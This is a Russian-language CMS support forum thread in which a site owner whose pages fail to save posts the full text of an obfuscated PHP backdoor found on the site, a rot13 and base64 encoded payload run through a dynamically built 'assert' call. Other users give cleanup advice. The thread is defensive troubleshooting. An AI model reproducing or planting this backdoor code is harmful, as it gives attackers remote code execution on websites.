Вход • Регистрация

Ошибка сохранения страниц

  •
  • 08 декабря 2015 г.
  • Всем добрый день.

    Вчера были проблемы с хостингом как мне казалось, страницы сайта грузились очень долго, либо загружались с поломанной вёрсткой и ошибкой 500 на пол экрана.

    Через несколько часов всё само собой улеглось. И при работе с сайтом заметил что когда я сохраняю страницу товара например, страница не перезагружается и не выводит на страницу с каталогом. Показывает лишь белую страницу.

    Ссылка превращается из такой: /admin/shop/site23/edit2942/
    В такую: /admin/shop/site23/save2942/

    Подскажите в чём может быть проблема?
    •
    • 08 декабря 2015 г. , редакция: 08 декабря 2015 г.
    • Вариантов много. Полагаю, если с хостом все ОК, то надо начать с проверки целостности таблиц базы данных, затем инициируйте процедуру оптимизации таблиц базы данных.
      •
      • 08 декабря 2015 г.
      • Дождался ответа от тех поддержки хостинга, сказали что вирус и выглядит он вот так.
        Как от него избавится?
        •
        • 08 декабря 2015 г. , редакция: 08 декабря 2015 г.
        • Очень похоже на PHP-Backdoor.
          Cпособ интересный - обычная обфускация - и описан еще в 2008. Им пользуются давно и это, наверное, самый распространённый тип бэкдора на сегодняшний день.
          Т.е. обратившись к вашему сайту можно передать на исполнение сторонний скрипт. Например, удалить все файлы, вывести на экран config.php и т.п.
          Ваша картинка отображает только часть кода. Необходим весь скрипт.
          Теперь Вам надо либо чистить все в ручную или перезалить не испорченные файлы и базу. Затем выяснить как данный скрипт к Вам попал и закрыть брешь (cms.diafan не позволит так просто внедрить данный скрипт, поэтому возможно это косяк либо админов хоста, либо Ваша невнимательность при использовании сторонних скриптов).
          •
          • 08 декабря 2015 г.
          • Вот весь код

            //###==###
            error_reporting(0);
            $strings = "as";$strings .= "sert";
            @$strings(str_rot13('riny(onfr64_qrpbqr("nJLtXTymp2I0XPEcLaLcXFO7VTIwnT8tWTyvqwftsFOyoUAyVUftnJLbVJIgpUE5XPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKFxcMTyyXPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKFx7nJLbVJymp2I0XPEwK1fvFSEHHS9OD0ASHSEsD0uOHyASIPWqXFy7nJLbpUWyM19gLKEwnPtvVF4uqFVfMzyfMI9aMKEsL29hqTIhqUZbWS9GEIWJEIWoVyAQHxyDIS9TFHkSGxSAEFWqXFxcrlEwZQ0vIIETYGtvB31yoUAyrlEwZQ0vq2yhMT93pl0kZwHkVwg9sJIfp2I7WTZjCFEwK1fvFSEHHS9OD0ASHSEsD0uOHyASIPWqB31cMvuzqJ5wqTyioy9yrTymqUZbVzA1pzksnJ5cqPVcXKfxLmR9L3IloS9cozy0XPWbqUEjBv8ip3IjMKWcozEyrTS0o3VhpaHiM2I0YaObpQ9xCFVhqKWfMJ5wo2EyXPEsH0IFIxIFJlWGEIWJEIWsGxSAEFWqYvEsH0IFIxIFJlWFEISIEIAHK1IFFFWqXF4vWaH9Vv51pzkyozAiMTHbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXF4vWzZ9Vv4xLmNhVvMcCGRznKN9Vv4xK1ASHyMSHyfvHxIAG1ESK0SRESVvKF4vWzt9Vv5gMQHbVwD3MzMxL2VjBJSvLJWyZwWzMQtlZ2AvBJD1MQyyATL2Vv4xK1ASHyMSHyfvH0IFIxIFK05OGHHvKF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKF4xK1ASHyMSHyfvFSEHHS9IH0IFK0SUEH5HVy0hWTZjYvVkVvxcB2A1pzksp2I0o3O0XPEwZFj0ZvkzLJkmMFx7L3IloS9mMKEipUDbWTZkYQR5BGRmYUElqJHcBlEcLaLtCFNtL3IloS9yrTIwXPEwZFx7L3IloS9woT9mMFtxLmRcB31yoUAynJLbnJ5cK2qyqPtvLJkfo3qsqKWfK2MipTIhVvx9CGRcrlEcLaLtCFOznJkyK2qyqS9wo250MJ50pltvnUE0pQbiY3A1pTIlnJ5xMKuuqT9lYaW1Y2qyqP5jnUN/MQ0vYaIloTIhL29xMFtxK1ASHyMSHyfvH0IFIxIFK05OGHHvKF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKFxhVvM1CFVhqKWfMJ5wo2EyXPEsH0IFIxIFJlWVISEDK1IGEIWsDHqSGyDvKFxhVvMwCFVhWTZjYvVznG0kWzyjCFVhWS9GEIWJEIWoVyWSGH9HEI9OEREFVy0hVvMbCFVhoJD1XPV0A2MzMTAvZQyuLzSvMGVlMzD4ZwAwLwyxAJD5MGEzAvVhWS9GEIWJEIWoVyASHyMSHy9BDH1SVy0hWS9GEIWJEIWoVyWSHIISH1EsIIWWVy0hWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqYvEwZP4vZFVcXGg9VTyzVPucp3AyqPtxnJW2XFxtrlOyL2uiVPEcLaL7VU0tnJLbnKAmMKDbWS9FEISIEIAHJlWjVy0cVPLzVPEsHxIEIHIGISfvpPWqVQ09VPWvMTMuMwV2BPVcVUftDTSmp2IlqPtxK1WSHIISH1EoVzZvKFx7VU19"));'));
            //###==###
            •
            • 08 декабря 2015 г.
            • Можно скачать папку custom, затем ее удалить.

              Нажать в в Темах - Сгенерировать тему и он сам покажет исправленные файлы.
            •
            • 08 декабря 2015 г. , редакция: 08 декабря 2015 г.
            • Интересная модификация.
              Проверьте .htaccess , index.php , index.html , а так же смотрите добавляемые левые папки со всяким бредом...
              А также
              Цитата
              Вам надо либо чистить все в ручную или перезалить не испорченные файлы и базу. Затем выяснить как данный скрипт к Вам попал и закрыть брешь (cms.diafan не позволит так просто внедрить данный скрипт, поэтому возможно это косяк либо админов хоста, либо Ваша невнимательность при использовании сторонних скриптов).

              Желательно для Вас это сделать оперативно. Пока более не могу добавить, т.к. загружен своими вопросами, если будет необходимо отвечу немного позже. Возможно другие участники форума, что-то подскажут.
              Не совсем согласен с Александр Биг Эпл (ba5), т.к. данный код позволяет корректировать и кастомизированные файлы (впрочем как и все остальное), но как вариант не плохой.
              •
              • 08 декабря 2015 г.
              • Все же интересная тема, лично я бы не спешил. Вычистил бы все вручную, модифицировал данный скрипт с отдачей в ответ сюрприза, поставил бы отдельное логирование на такое обращение к сайту, затем постарался бы определить от куда идут обращения. В общем все зависит от фантазии.
  •
  • 08 декабря 2015 г. , редакция: 08 декабря 2015 г.
  • Цитата
    Если какие-то системные файлы были изменены, метод их покажет

    Александр Биг Эпл (ba5), например метод не сможет показать, что изменился .htaccess, index.php, init.php и т.д., или созданы дополнительные папки и файлы, к которым возможно обратиться напрямую (минуя обработчик cms)

Новости

  • Окончание поддержки устаревших версий
  • 19 сентября, пятница
  • Мы внесли изменения в лицензию и объявляем, что прекращаем техническую консультационную поддержку сайтов на DIAFAN.CMS версий старше 7.0. А это все минорные версии платформы, предшествующие актуальной линейке, а именно: версии серии 4.x, 5.x, 6.x.
  • DIAFAN.CMS 7.3: обновлённое управление контентом с ИИ
  • 15 сентября, понедельник
  • У нас отличные новости! Мы выпустили новую сборку DIAFAN.CMS 7.3, которая включает встроенные нейросети непосредственно в административной панели. Это значит, что создание контента для вашего сайта больше не будет проблемой — искусственный интеллект возьмет эту задачу на себя, избавляя вас от необходимости привлекать копирайтеров или тратить время на написание текстов самостоятельно.
  • Изменение тарифов Diafan.Cloud
  • 25 марта
  • Мы обновили систему тарифов, учитывая опыт работы с клиентами и современные рыночные условия. Новая тарифная сетка разработана специально для того, чтобы лучше отвечать вашим потребностям. Резкого повышения цен не произошло. Более того, некоторые тарифы даже стали выгоднее и доступнее. 
Все новости

Блоги

  • Обновление безопасности в DIAFAN.CMS 7.3
  • 10.09.2025

  • DIAFAN.CMS славится нагрузоустойчивостью и безопасностью, про инциденты со взломом сайта на нашей системе давненько не слышали, но недавно получили мы письмо от fstec.ru такого характера:

    Обнаружена уязвимость в CMS-системе DIAFAN, позволяющая нарушителю, действующему удалённо, красть сессионные куки через XSS-атаку.

Читать блоги

Форум

Перейти на форум